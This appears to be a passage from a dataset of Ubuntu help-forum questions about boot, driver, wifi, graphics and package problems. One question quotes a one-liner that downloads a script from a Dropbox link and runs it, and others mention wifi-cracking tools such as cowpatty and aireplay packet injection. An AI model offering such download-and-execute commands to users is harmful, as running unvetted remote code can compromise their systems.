435085	fn + up and fn + down both increase brightness , notification not showing when doing so ( lenovo z570 )	when i installed ubuntu on my lenovo z570 , with ubuntu 13.10 i could n't manage to get the brightness to change . i read some of the solution to similar problems people had and i played around with /etc/default/grub , changing : grub_cmdline_linux_default grub_cmdline_linux`lines [ with different things like : ] acpi_backlight=vendor quiet splash acpi_osi=linux as far as i remember the last time i had this problem this code : grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' acpi_backlight=vendor '' fixed it for me . now it is sort of working out as well . i can change the brightness from the 'settings application ' . however when i press fn+up or fn+down keys , the brightness just goes up and it does n't show a notification like the increase/decrease volume does .
435086	ubuntu 12.04 boot-repair gets in infinite loop	i am attempting to dual-boot ubuntu 12.04 with windows 8.1 , but i am unable to run a liveusb without turning on legacy mode first . in legacy mode i was able to install . i planned to fix the legacy mode problem by running boot-repair from the 'try ubuntu ' option on the liveusb . however , boot-repair gives me the following error in an infinite loop : '' the boot of your pc is in legacy mode . you may want to retry after changing it to efi mode . do you want to continue ? '' i press yes , it says it is applying changes , then it gives me this prompt again , over and over . but it does n't fix my boot . i have the 'separate/boot/efi partition ' option ticked . so , if i ca n't run ubuntu in efi mode , and i ca n't run boot-repair in legacy mode , what am i supposed to do ? the strange part is , i had ubuntu-windows8 dual boot set up on this machine before and it worked fine , but i broke my ubuntu side and had to do a fresh install . i remember that i had to run boot-repair to fix the legacy mode problem before , and it worked . is there something i 'm missing ?
435087	setting up a dual boot environment for ubuntu and windows 7	i just switched over to ubuntu 13.10 as my main os and quickly realised that there are some applications that i need to run under windows and for some reason or another ca n't use virtualbox for . because of that , i 'd like to set up a dual boot between ubuntu and windows with ubuntu as my primary os . i have a 60gb ssd which i have / mounted on as well as the bootloader , and a 1tb hard drive which i have /home mounted on . my plan is to resize the 1tb into two 500gb partitions , one for /home and the other to hold my windows installation . my end goal is to have ubuntu automatically booted when i turn on the computer , and have to intervene and select windows for the occasional time that i need a windows environment . being relatively new to ubuntu and having to mess with scary things like bootloaders , does anyone have a reliable guide i can follow or point me in the right direction ? thank you !
435090	epson perfection 3490 scanner + 13.10 - no longer supported ?	this really is a question for canonical & anyone who has worked on selecting scanner modules to go in the current kernel . i 'm running ubuntu 13.10 , and my scanner , the very old epson perfection 3490 , is not working most of the time . `` most of the time '' is the interesting thing here : sometimes , and following upgrades of the 'base ' ubuntu 13.10 , the scanner works ! an update or two later , the scanner no longer works . which tells me that , for some reason , some of the modules that canonical decided to include with the base updates , included my old scanner , and some it did not . i understand that we are on the twilight of the life of this scanner , but , is there some guidance form canonical on why this was happening , and should i be getting a new scanner ? thanks
435092	add `` open in terminal '' shortcut	i would like to create a keyboard shortcut in order to open the terminal when browsing a given folder . i am using nautilus and ubuntu 12.04.3 if we right click in a folder there is the option `` open in terminal '' . i tried by adding in the `` system settings > keyboard > shortcut '' a new shortcut . as name i put `` open in terminal '' and as command for example i did `` ctrl+super+t '' but it does not work .
435098	how to upgrade to php 5.3.23	i 'm trying to install zendframework through composer . using the command , php5 composer.phar install then i get the error : problem 1 - installation request for zendframework/zendframework 2.3 . * - > satisfiable by zendframework/zendframework [ 2.3.0 ] . - zendframework/zendframework 2.3.0 requires php > =5.3.23 - > no matching package found . i suspect this is because , my current php version is 5.3.10 , a system update and a upgrade did n't update this . how can i get my php version to upgrade to 5.3.23 ? thanks
435100	how to create /etc/.java/deployment directory	how to create /etc/.java/deployment directory and to move deploymentruleset.jar file in that directory which sits on my desktop . i need this so i can use my netbanking but since i 'm a new linux user ( very new ) i dont know to use it . i tried but nothing . can anyone write commands for terminal step by step ?
435106	how to get ubuntu 13.10 to recognise windows 8.1 during install	current system : i have installed windows 8.1 , and would like some guidance on installing ubuntu so that the system is dual boot . my drive looks like the following , ( after installing windows ) on gparted , and shrinking sda4 from gparted ( ubuntu currently booted from usb ) : windows partitions on gparted if i use the ubuntu 13.10 installer , when asked to select the installation type , there is the message : this computer currently has no detected operating systems . what would you like to do ? additional info : i had previously tried to set up a raid 1 system on the disk . perhaps this makes a difference to the solution ? question : how can i get ubuntu to recognise windows so that the machine operates a dual boot ? thanks
435110	installing ubuntu 13.10 alongside , 13.04 . potential boot loader issues	below is an image of my hard drive partitions as they exist currently . /dev/sda4 is windows 8 /dev/sda9 is ubuntu 13.04 /dev/sda5 is where i plan to install 13.10 as i am currently not using it for anything . my goal is to have both versions of ubuntu bootable for a time while i test the 13.10 installation . once i feel confidant in it i will install something else to sda9 . also on the 13.10 installation i plan to install /home to its own partition . i have two questions : does anyone for see any issues i will likely run into with the bootloader ? what is a good standard ratio of disk space to allocate to the home partition and the root partition ? edit : all the standard stuff of disabling fast boot , secure boot etc . is already taken care of .
435111	wine will not install on ubuntu 32 and 64 bit or dell inspiron 3421	good afternoon community after two relentless two days of research on this issue in which i found several convesas but unfortunately nothing that solved my wine does not install . when i know to install wine should do the following : sudo add-apt-repository ppa : ubuntu-wine/ppa sudo apt-get install wine in my not work in the following error : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean you have que requested an impossible situation or if you are using the unstable distribution que some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine : depends : wine1.6 but it is not going to be installed or wine1.7 but it is not going to be installed if i try : sudo apt- get install wine1.6 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean you have que requested an impossible situation or if you are using the unstable distribution que some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine1.6 : depends : wine1.6 - i386 ( = 1:1.6.1 - 0ubuntu1 ~ ppa1 ) recommends : winbind e : unable to correct problems , you have held broken packages . and the same error for any version ... i tried to install it from the tar.gz but not well installed . i followed all of the tutorials forums nothing worked so i did some tests on my machine : i installed ubuntu 12.04 64 bit in virtual box i tried to install wine and success i installed ubuntu 13.10 64 bit in virtual box i tried to install wine and success too : / and why not in my install ? i ran the previous two ubuntus the live cd i tried to install wine and error in two ! o_o well then i found it was for them to be 64 bits right ? ok downloaded the ubuntu 13.10 32bit ran the live cd i tried to install wine and error ! finally hit me that the problem is in hardware , it can only be right ? i configured sudo lshw in terminal and got this : https : //googledrive.com/host/0bwbeh4qjvkxjbeo3c0yxqnr2ync i can not post links here because i have no reputation but googled across this forum and saw several places outross all kind of response but with no success at all . please does anyone know how to solve this ?
435112	weird nvidia-96 install error	on ubuntu 12.04.4 i ran on terminal `` sudo apt-get update '' and then after that i ran `` sudo apt-get install nvidia-96 '' after the install was configuring nvidia-96 after a few seconds there ( i dont remember what the terminal was saying ) a message box popped up saying `` sorry , an error occurred while installing software . package : nvidia-96 '' then i pressed ok and in the terminal i pressed x and restarted the computer , after i entered ubuntu again a message box appeared saying `` the system is running in low graphics mode '' then i went to tty1 and logged in and uninstalled nvidia-96 and restarted the computer and it went fine , but how can i install nvidia-96 without getting an error ? please help i need it to play most ubuntu and `` wine '' games
435113	compiling cowpatty on ubuntu 13.10 64bit fails	so , i downloaded cowpatty from their site [ 1 ] and i am trying to compile it . however , there is an error that prevents the make-process . root @ phil-laptop : /home/phil/wifite-2.0r85/cowpatty-4.6 # make cc -pipe -wall -dopenssl -o2 -g3 -ggdb -c -o md5.o md5.c md5.c:20:25 : fatal error : openssl/md5.h : no such file or directory # include < openssl/md5.h > ^ compilation terminated . make : *** [ md5.o ] error 1 openssl is installed on this system . any advice ? thanks ! [ 1 ] http : //wirelessdefence.org/contents/cowpattymain.htm # installing_cowpatty :
435114	overload capslock with esc and ctrl using xcape	i want to : turn off capslock when hitting the capslock key escape when hitting the capslock key behave like ctrl when pressing down the capslock key what i have in my ~/.xmodmap : ! set capslock to lctrl remove lock = caps_lock remove control = control_l keycode 66 = control_l add control = control_l ! set escape to capslock keycode 9 = caps_lock add lock = caps_lock ! dummy escape key for xcape keycode 254 = escape what i have at the end of my ~/.profile : $ home/xcape/xcape -e 'control_l=escape ' # run xcape after login things work mostly as expected with just xmodmap , and mostly as expected with xmodmap + $ home/xcape/xcape -e 'control_l=escape ' when not run from .profile . i get some strange behaviors when it runs from .profile ; capslock key still toggles capslock in addition to behaving as esc and ctrl . my left ctrl exhibits this exact behavior as well . maybe i should be running this from somewhere other than .profile ? edit : tried running $ home/xcape/xcape -e 'control_l=escape ' from xubuntu 's menu - > settings manager - > session and startup - > application autostart with no effect at all .
435115	duplicate sources.list entry cdrom:	i am getting the following error msg when entering sudo apt-get update in terminal : w : duplicate sources.list entry cdrom : //ubuntu 13.10 _saucy salamander_ - release i386 ( 20131016.1 ) / saucy/main i386 packages ( /var/lib/apt/lists/ubuntu % 2013.10 % 20 % 5fsaucy % 20salamander % 5f % 20- % 20release % 20i386 % 20 ( 20131016.1 ) _dists_saucy_main_binary-i386_packages ) w : duplicate sources.list entry cdrom : //ubuntu 13.10 _saucy salamander_ - release i386 ( 20131016.1 ) / saucy/restricted i386 packages ( /var/lib/apt/lists/ubuntu % 2013.10 % 20 % 5fsaucy % 20salamander % 5f % 20- % 20release % 20i386 % 20 ( 20131016.1 ) _dists_saucy_restricted_binary-i386_packages ) w : you may want to run apt-get update to correct these problems i 'm running ubuntu from a flash-drive . i 've run apt get update several times , to no avail . how do i correct these ?
435118	watch tv in ubuntu 13.10 with a wintv tuner & kaffiene ?	i found a great program called kaffiene , since i use my tv as a pc monitor rather than a tv i decided to get my tv tuner ( i still have some windows pc 's ) and plug it in my pc . then i opened kaffiene , and it would n't detect any channels on the signal , it seems to be plugged properly . this is my tuner : http : //www.hauppauge.com/site/products/data_hvr950q.html also , when i try to watch tv , i get a black screen .
435125	how to find all dependencies not installed	i have .deb file which is not updated for ubuntu 13.10 , it needs a lot of dependencies to be installed . how can i get a list of all its dependencies not installed in my ubuntu 13.10 ?
435132	how to install djigzo on ubuntu ?	can any one provide step by step configuration to install djigzo ? djigzo website .
435135	how do i bypass the tty login on ubuntu 12.04 lts and what is it ?	i have ubuntu 12.04 lts and i want to know what is a tty login . i was opening my laptop and the screen went black and was written `` ubuntu 12.04 lts harshira-hp-probook-445-g1 tty1 '' . now it does not go through this . what is a tty ? and how do i bypass the tty login so that i can use my pc in graphical mode ?
435141	no wifi on ubuntu 13.10	i just installed ubuntu 13.10 on my toshiba satellite l645d-s4030 laptop and i am unable to detect any wifi networks , my wifi light is not on , but i can still use an ethernet connection . i know that our wifi is working since we are using it on other devices . i already tried fn f8 and it does not turn on the wifi . i am new to ubuntu and linux and i am sorry if i am missing something obvious . how do i get my computer to connect to my wifi network ? edit : http : //pastebin.com/mgd4pzsz wireless-info.txt edits from discussion below sudo rfkill unblock all did n't work . lspci -v | grep -i wireless does n't return any results . from @ wildman . it 's a custom script written by him and friends that helps to diagnose wireless issues . wget -n -t 5 -t 10 http : //dl.dropbox.com/u/57264241/wireless_script & & chmod +x wireless_script & & ./wireless_script the results of the script can be found at http : //pastebin.com/mgd4pzsz as above . @ wildman 's response : your wifi is not showing up , it is an internal wifi correct ? you may want to go into your bios and see if there is a setting to enable wifi if your bios is not uefi then reset it and see if your wifi shows up . you can make sure it is plugged in good if none of those things help then your wifi card may be bad . even if it was turned off or a driver was not installed you should be able to see if in the information you posted for me .
435144	help , installed ubuntu with lvm2 and raid1 - mystery of the time traveling computer	i am a relative linux novice , so please bear with me . a few years a go , i installed ubuntu server 11 to act as household web/email/file server . i had decided to move on from a windows server environment and give ubuntu a shot ( i had been running a suse desktop system for a number of years to play around with ) . i bought two 1tb drives which i intended to use in a raid 1 configuration . not knowing what i was doing , i installed ubuntu using lvm2 . i had one drive installed , and after completing the ubuntu installation , i installed the second drive and then created the mirror . everything seemed to work fine , except that i could see both disks listed in the disk manager ( mirrored drive not hidden as i expected for a raid 1 configuration ) , but the disk manager listed the drive as not mounted , so since everything seemed to be working i did n't worry about it . fast forward to yesterday when the server pc gave up the ghost and then to this morning where i proceeded to move the drives to a new computer . i was confident of a fairly seamless transition as i had moved linux systems to new hardware configurations before with little effort needed . first i installed the `` master '' drive thinking i would boot up on that and wait to add the second drive and rebuild the mirror once everything was working properly . the system booted up , but to my surprise ( and dismay ) it booted into ubuntu 11 ( i had upgraded to 12 months ago ) . not only that , but i was missing lots of data ! in fact , my srv directory for example ( which had contained smb and www directories with much data_ ) was missing . in fact , the system was in the exact same state it was before i had added the second drive and created the mirror several years ago ! ! it was like the system had traveled back in time to the day i had installed it ! freaking out at this point , i decided to try the `` mirror '' drive and see how that worked . this drive does not boot into ubuntu at all , and instead the grub menu only contains an option to run memtest x86 ! ! finally , i installed both drives and it successfully booted into my 12.04 ubuntu system with all my data intact . this has really got me pulling my hair out . i figure it must have something to do with lvm2 ignoring the mirror configuration in the bios and somehow utilizing the second disk to store data . what really gets me is how i can boot into ubuntu 11 with the one drive and seem to travel back in time , yet can still go back to the present by adding the other drive . i am sure this all makes sense to someone out there , but i am lost . what i really need is to be able to get the system into a state where i can boot to my system off a single drive and then set up the raid 1 configuration . please tell me there is some way to do this . if i have to manually recover the data , wipe the system and reload i will do that , but being a novice , i do n't relish the idea of reconfiguring samba ( i have it acting as a domain controller on my windows network , and getting auth to work was a goat screw ) nor getting the email server working again . please tell me there is a relatively painless way to do this . if you need me to provide any other information , just let me know . and thanks in advance for the time .
435145	how to remove encryption from volume during installation	i 'm currently in the process of installing ubuntu server 12.04 onto a fresh build . i have two 3tb hard drives that i 'd like to run in software raid 1 , and was following this tutorial . during installation , i forgot that i had data on one of the hard drives ( the other is new ) and , in an effort to erase that data , did a stupid thing during the `` partition disks '' section of the setup by choosing `` guided - use entire disk and set up encrypted lvm '' . now one of the disks is encrypted and i ca n't seem to figure out how to reverse this action ( if that 's even possible ) . or if that is n't possible , can someone advise me on how i should proceed at this stage ?
435148	ubuntu 12.04 lts with ralink rt3290 , are monitor mode and packet injection supported with rt2800pci that came with the distro ?	i have a fresh installation of ubuntu 12.04 lts and have a ralink rt3290 wireless adapter . the distribution comes with rt2800pci driver and i 've installed no other drivers or patches . my network interface is - wlan0 , and i can put it into monitor mode using : sudo iwconfig wlan0 mode monitor if i check with iwconfig , it shows monitor mode enabled . if i try to inject packet with aireplay , it says : arp linktype is set to 1 ( ethernet ) expected arphrd_ieee80211 or arphrd_ieee80211_prism instead . make sure rfmon is enabled ; run sudo ifconfig wlan0 up , sudo iwconfig wlan0 mode monitor channel # i can get a list of networks with sudo iwlist scan . my question is , does this card/driver truly supports monitor mode and packet injection ? and if yes , how can i enable both monitor mode and packet injection the right way ? info - kernel - 3.11.0-15-generic , distro - ubuntu 12.04.4 lts , no patches , no upgrades , rfkill - hard blocked : no upd1 - after i disable networking , then i can go to monitor mode using code above but the moment i enable networking and wireless networking , checking iwconfig says mode is managed . driver or card problem ? if i stop using distro rt2800pci and install backports driver , will it work perfectly ?
435149	can not open matlab figure window under ubuntu 13.10	i am using matlab r2013b under ubuntu . before today everything was fine . i do n't remember what i did , but suddenly my matlab stops showing the figure window when i plot something . for example , if i execute the following code x=1:10 ; plot ( x ) nothing pops out . at the side bar there is no sign an additional figure window exists . before today when i plot something in matlab , the matlab icon would show an additional small bar , like what is now displayed on the firefox icon . however , if i use alt+tab i can see the figure window is there i tried many ways to make the window visible again but failed . moreover , since i do n't remember i did any change to my matlab settings since the last time i could plot , i suspect this is some failure of the ubuntu desktop . could some one point out what i can do to regain my figure window ? thanks !
435150	an error occurred-malformed-/etc/apt/sources.list.d	please help me for below problem . in the synaptic package manager . e : malformed line 1 in source list /etc/apt/sources.list.d/openfoam.list ( dist parse ) e : the list of sources could not be read . go to the repository dialog to correct the problem . e : _cache- > open ( ) failed , please report .
435151	installing ubuntu 12.04 lts alongside windows 7	i am new to ubuntu , i have the following issue : i have windows 7 x64 , with three partitions : c : for system files and such ( 100 gb ) , d : for games , photos , stuff like that ( 320 gb ) and u : , which i created especially to install ubuntu on it ( 50 gb ) . i want to install ubuntu 12.04 lts on partition u : , to use it as a hobby when i get too bored of windows . how can i do that without altering the other partitions ? thanks in advance .
435154	will i lose my data when i install ubuntu alongside windows ?	currently i am using windows 8.1 ( trial version ) , but i wanted to check out ubuntu as my trial ends within 2 months . i have 500gb hdd and half of it is filled with important data . now , i want to install ubuntu 12.04 lts alongside windows 8.1 . before that i wanted to make sure if i 'd lose my data when i install it . the question is how do i install ubuntu on my computer without losing data ?
435155	using two hauppauge dvb-t sticks at the same time	i have two hauppauge wintv dbt-t sticks that i want to use at the same time ( setting up a tvheadend server ) . one is a older wintv stick that worked right out of the box . the other one is a ministick that i neaded to use the nonfree kernel version to get to work . i have managed to get them to work one at the time ( rebooting in between ) but when i try to use them at the same time only one of them workes . it 's different witch one every time i do a reboot . if i look in tvheadend i can see that one is attached to /dev/dvb/adapter0 but the other one is not attached at all . how can i get them both to work at the same time ? any help with tips to where to look would be much aprishiated
435160	ca n't boot windows 7 after installing ubuntu	i installed ubuntu yesterday alongside windows 7 and whenever i start my computer i do n't have the option to boot windows . when the computer starts it goes straight to ubuntu without giving me an os selection menu . when it goes to ubuntu it gives me ubuntu repair options and ubuntu normal start option . i still have all of the windows 7 files on my hard drive , but windows 7 has no way to boot .
435161	modify sound indicator menu to hide controls from inactive player or remove it after closeing	i like spotify 's indicator menu which expands whenever the application is open . i do n't like rhythmbox 's which shows all the buttons all the time . i 'd like to hide the rew/play/ff buttons from rhythmbox when the application is inactive . thank you for your help .
435162	create `` virtual '' lan on laptop ( not vlan )	i 'm running a number of virtual machines on a ubuntu 12.04 host . for various reasons all these vms need fixed ip addresses . the laptop in question is used for demonstrations -- and this is where the problems arise ... depending on the circumstances i will either use wifi or a mobile tether to get an internet connection , which in both cases leads to the laptop being assigned an address via dhcp . frequently this dynamic address is on a different subnet to the one used by the fixed ones ( 192.168.0/20 ) . this makes the static addresses unreachable from the host os . after some thought , it seems the most elegant solution is to create a separate lan on the host ( for the subnet used by the vms ) and then bridge it to whatever subnet is assigned to the host . bear in mind the vm 's only need to communicate with each other and the host . they do not need access beyond that . questions : is this the best approach ? if , it is how could i go about implementing it ? many thanks .
435163	how to make ubuntu honor `` ignore-hosts '' proxy settings for ipv6 ?	i just typed under `` dconf-editor '' , system â proxy â ignore-hosts , the following content : [ 'localhost ' , '127.0.0.0/8 ' , ' : :1 ' , '192.168.0.1 ' , '2000 : :/3 ' , 'fc00 : :/8 ' ] but , google chrome ( and apt-get update / upgrade ) is just ignoring this settings . edited : also , firefox does n't honor the ingore-hosts settings , even configuring it to `` use system proxy settings '' . for example , my proxy server ( ubuntu with squid3 ) is in dual-stacked mode but , i do not want to access ipv6 web sites through the proxy , that 's why i 'm trying to ignore the entire ipv6 internet with the entry 2000 : :/3 , but , it does not work as expected . edited : also , i do n't need the proxy to access hyperboria sites , which resides under fc00 : :/8 but , it does n't work either ... why i 'm doing this ? because my environment is already a ipv6-only network and , to access the old internet infrastructure ( ipv4-only ) , i need to go through the dual-stacked proxy . but i need the proxy only when a web site does n't have ipv6 ... how can i know that it does n't work ? ! it is simple , just access a web site that shows a ipv6 address on it , for example , http : //www.sixxs.net or http : //ipv6.whatismyv6.com , then , i 'm still seeing the ipv6 address of the proxy server , so , `` ignore-hosts entry '2000 : :/3 ' '' does n't seem to be working . edited : plus , when i 'm trying to access a hyperboria website , squid returns an error that it can not reach fc00 : :/8 network ( squid error : ( 101 ) network is unreachable ) ( of course it ca n't , the cjdns router is running right on my ubuntu desktop , so , no need to go through proxy when browsing hyperboria fc00 : :/8 but , ubuntu is n't honoring ignore-hosts under proxy settings .
435168	how can i know what programs does some apt-get package contains ?	i would like to know what does some specific package install , for example , when installing ncurses , i have found that tab key expands : sudo apt-get install ncurses- to show : ncurses-base ncurses-doc ncurses-hexedit ncurses-bin ncurses-examples ncurses-term how could i know what does , say , ncurses-term install ? i am interested mainly in programs , but libraries and any other filetypes could be useful too . command-line method , if possible , would be preferred ( any others accepted too ) .
435172	bootstrap fails with windows azure : xml schema validation error in network configuration	i am trying to test juju with windows azure . i always get this error : put request failed : badrequest - xml schema validation error in network configuration i have tried several times , with and without -- update-tools parameter , always the same issue . the admin certificate is uploaded correctly . the juju-azure-private is create inside the windows azure storage and it has new files uploaded . any idea ?
435175	making more off forever in octave	octave by default uses the `` more '' command to page results . it is possible to type `` more off '' to stop that in the current session . how can i stop it permanently without passing that command to octave ? ( i want something like option , editing file , environment variable , ... )
435177	ubuntu 13.10 ultra sluggish	i installed ubuntu 13.10 a week ago , and have installed it three times since . the reason : every time i installed it . with all updates . just restricted extras . 3.nothing but the system , i got a severe performance glitch . my computer it 's a dell-inspiron n4010 with an intel core i5 processor , an 500 gb hdd , 4 gb ram and an intel graphics card . besides reinstalling , i 've tried creating and modifying the etc/xorg file but did n't work . i installed ubuntu from a dvd and formatted my disc to use only ubuntu . i 'm eager for an answer . i would really appreciate the help here .
435179	minimalistic ubuntu install without desktop for usb	i 'm looking for a ubuntu installation that runs from a usb flash drive . i do not want a desktop , all i need is a shell . it should be as small and fast as possible . i currently work with debian on a cubieboard ( cubian ) and i really like it . i now bought a new system which has an intel cpu & a nvidia gpu . i was advised to switch to ubuntu for better driver support . is there such an iso image for usb ? or maybe a way to create it myself ( with limited linux knowledge ) ? thanks in advance for your time !
435181	ubuntu 64bit or 32bit	we have a advent pc that has 2gb of ram and a 2.20ghz ( i can list full specs if needed ) 64bit cpu , on ubuntu 's website it says if you have 2gb of ram or less install the 32bit version ; but could n't we benefit if we installed ubuntu 64bit ? that way the os could take advantage of the cpus 64it instruction set . any answer would be appreciated .
435182	error : no root file system on brand new computer	just built my first computer from scratch and started to install ubuntu but on the `` installation type '' page , i got an error message that reads `` no root file system is defined . please correct from the partitioning menu '' . not sure how to proceed . mind you this is my first build ever !
435187	total novice : how do i install this driver after these instructions ?	as my first question , and as a totally new user of lubuntu , i really need to know how to install the wifi driver on my emachines em250 netbook . i installed lubuntu on it , and everything works fine except the wifi which does n't seem to exist . so after many , many hours of searching and reading , i came upon these instructions at this link : http : //ubuntuforums.org/showthread.php ? t=1421768 i tried to post the text here for you to read , but it would n't work without this site changing it for some reason . now the thing is , almost all of that description is greek to me . it assumes that you know a bunch of stuff about lubuntu already . is there anyone out there kind enough to interpret these descriptions for me , step by step , so that i can try to install the driver . after all , what is a netbook without wifi . edit : my system tells me it 's `` ubuntu 13.10 '' . after running some commands , i got this info about my system : 01:00.0 network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 ) and lo no wireless extensions . eth0 no wireless extensions .
435190	popping sound on volume change not playing	i was having issues with my beats audio playing in ubuntu so i followed a guide for hdajackretask which fixed my beats issue , but now the popping sound that is supposed to play when you use the volume change hotkeys does n't play . the volume does change , and i get the little notification at the top right of my screen , but the sound that indicates this ( like in osx ) does n't play . if someone could help me get this sound back , i 'd really appreciate it ! thanks in advance .
435199	wireless does not work ( ubuntu 13.04 )	i 'm new to linux and installed ubuntu 13.04 32bit on an older dell inspiron e1705 laptop . both the wireless and wired ethernet connections are not recognized . i would appreciate any help getting either working but wireless would be the most useful . the wlan card is a broadcom bcm4311 b/g internal card . please help ubuntu power users , you are my only hope !
435200	errno 5 input/output error when installing ubuntu 12.04 or netrunner 13.12	i am trying to install netrunner 13.12 on a brand new desktop pc . when i originally got the error i tried another hdd that i know was 100 % working . the live usb works great either distro . now i have tried three different iso and same error . i have tried erasing the partitions before install , no luck . i have tried manual making the /root /home /swap files on the drive , no luck . i have tried different sata cables , different sata ports , different usb ports and when i try to install in failsafe mode it just freezes . sometimes it just freezes while it is copying files .
435201	windows wireless drivers	i just installed ubuntu 13.10 today and i have a netgear wireless adapter ( wna3100 ) that i 'm trying to get working . i installed the windows wireless driver application but i ca n't seem to open it . i check the ubuntu software center and other people running 13.10 are having the same issue . i already downloaded the inf driver file , i just need to know how to install it . please help !
435204	how to boot with bluetooth turned off ?	i want that my bluetooth by default be turned off . how can i do that on samsung laptop running ubuntu 13.10 ?
435205	recover from rescue mode	i have installed windows 8 then linux in dual boot in my laptop . windows installed on c drive and linux on d drive . one day extremly i have format the linux drive d dtive from windows it was the succesful operation but after reboot the windows i have got the grub > window and i ca n't do anything and i do n't have any cd of llinux or windows to boot from it , so any body please tell me how to remove it . ? i do n't have knowledge about grub so i did n't try any thing.. there is no menu fo 'c ' and when i type root ( hd0,0 ) it says `` file system type unknown , partition type 0x7 . i formated the d drive in ntfs which contains linux data that is the reson of it .
435208	how can i fix the error in 7-zip `` 0 can not open output file g : \autorun.inf '' when trying to create a live usb with ubuntu on it ?	i run a 64-bit windows 8 laptop . i have tried both the 12.04.4 and 13.1 iso files . i use the universal usb installer here http : //www.pendrivelinux.com/universal-usb-installer-easy-as-1-2-3/ . when i try to install ubuntu onto my flash drive it runs smoothly until it extracting files using 7-zip . immediately an error box appears below the progress bar saying `` 0 can not open output file g : \autorun.inf '' . if i let it extract to 99 % then close , and let the rest install normally , i ca n't boot ubuntu at all .
435210	ca n't load extension glx , ca n't load fglrx , and i do n't know how to do anything to fix them	if i try to boot normally or through failsafex , i get the `` low-graphics mode '' screen and ca n't do anything . if i go into the terminal from there , i have `` loading extension glx '' and then no other commands will work . if i go to the startx log ( i believe that 's what it is ; under troubleshooting from the low-graphics screen ) i see the problem with fglrx . i have no idea how to rectify this since terminal is n't working . what can i do ?
435211	how to remove windows and boot ubuntu	i have installed ubuntu on a clean hard drive and would like to know how to get it to boot . do i need to install ubuntu over a version of windows before it will boot ? i would like to use ubuntu without any windows installed . thanks for any and all answers .
435212	ubuntu 13.10 : xrandr returns hdmi disconneted	i have an asus pb278q that i am trying to hook up to my laptop running ubuntu 13.10 . when i type xrandr it reports the proper information for screen 0 but says that hdmi-0 is disconnected . i have tried taking out and replugging in the hdmi cable , and leaving it in from when the system boots up . i 've tried endlessly installing different nvidia drivers and removing and reinstalling bumblebee . the only thing i have learned is that installing bumblebee seems to brick my display . nothing has helped . any suggestions of how to get around this ?
435213	how to track software usage	is it possible ( preferably via some package ) to know how many times have i used software ? all software . and maybe for how long ? also when was it last opened . the more provided info the better . it 's also preferable to get the output in a gui .
435215	optimus/nvidia and openggl giving troubles	first time writing on this forum so be nice : d i am a programmer but i mostly worked on windows so far , i wanted to start learning linux more seriously and being able to compile my cpp programs on ubuntu 12.04 aswell . what i am interested in doing at the moment is some opengl programs . now here the troubles starts . i tried to compile a simple freeglut window and everything works , bot normal and optirun way . now i sucessifully compiled glfw3 and compiled a test program . if i run normaly ( without the optirun ) , the program works and show up on screen properly but shoots out this warning : xlib : extension `` nv-glx '' missing on display `` :0 '' . which still i dunno how bad it is . if then i run optirun version i get some nice errors here is the log : # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # giordi @ giordi-linux-pc : /usr/local/src/glfw-3.0.4 $ optirun ./main.exec libgl error : failed to load driver : i965 libgl error : try again with libgl_debug=verbose for more details . libgl error : failed to load driver : swrast libgl error : try again with libgl_debug=verbose for more details . libgl error : failed to load driver : i965 libgl error : try again with libgl_debug=verbose for more details . libgl error : failed to load driver : swrast libgl error : try again with libgl_debug=verbose for more details . primus : fatal : failed to acquire direct rendering context for display thread # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # i googled around and looks like i am missing some kind of 32 bit drivers ? ? i installed the nividia drivers as explained here : http : //www.muktware.com/2013/12/install-nvidia-331-bumblebee-optimus-cards/18271 anyone can spread a litght please ? i did the same kind of setup on an old laptop of mine and everything works fine , except for the fact is running drivers version 319 . i can rpogram on the old laptop of course but on my current laptop i am running a gtx 780m and i wish to use that for high performance graphic and computing . any help much appreciated cheers m .
435216	there is a problem about ipv6 on ubuntu13.10 wireless	i’m a novice of ubuntu . there is a problem about ipv6 on ubuntu . my wireless supports ipv6 , at the first time , i can’t connect to the ipv6 either win7 or ubuntu 13.10. ! when i use norton to trust this wireless on win7 , it works , i can connect to the ipv6 website . but it doesn’t work on ubuntu yet . ps : my ufw is closed . i use the same hosts on both windows7 and ubuntu 13.10 . and the ipv4 works well . what should i do ?
435222	ubuntu 13.10 and nvidia . second monitor causes graphics settings to reset	i 'm trying to get a second monitor on my laptop , plugged in through hdmi . i can get the second screen to be detected and display stuff , but every minute or two the graphics will freak out , both screens will go black , and all my windows will appear on one monitor ( it seems to switch between monitors ) . the other monitor will be disabled when this happens . obviously its impossible to get anything done with this happening . here is the output from lspci -v | grep nvidia 02:00.0 vga compatible controller : nvidia corporation gf108m [ geforce gt 435m ] ( rev a1 ) i have tried changing the xorg.conf file in /etc/x11/ and it does n't seem to do anything . i have deleted it , filled it with gibberish , and there is no effect either way . here is my xorg.conf . i created this by going into nvidia-settings and saved the config file . section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` ancor communications inc asus pb278 '' horizsync 24.0 - 99.0 vertrefresh 24.0 - 76.0 option `` dpms '' endsection section `` monitor '' identifier `` monitor1 '' horizsync 30.0 - 75.0 vertrefresh 59.6 option `` monitor-hdmi '' option `` rightof monitor0 '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gt 435m '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` nvidiaxineramainfoorder '' `` dfp-1 '' option `` metamodes '' `` hdmi-0 : nvidia-auto-select +0+0 '' option `` metamodes '' `` 1366x768 +0+0 '' option `` sli '' `` off '' option `` multigpu '' `` off '' option `` basemosaic '' `` off '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` device0 '' monitor `` monitor1 '' defaultdepth 24 option `` stereo 0 '' option `` nvidiaxineramainfoorder '' `` dfp-0 '' option `` sli '' `` off '' option `` multigpu '' `` off '' option `` basemosaic '' `` off '' subsection `` display '' depth 24 endsubsection endsection it feels like i have tried every combination of nvidia driver and bumblebee install and 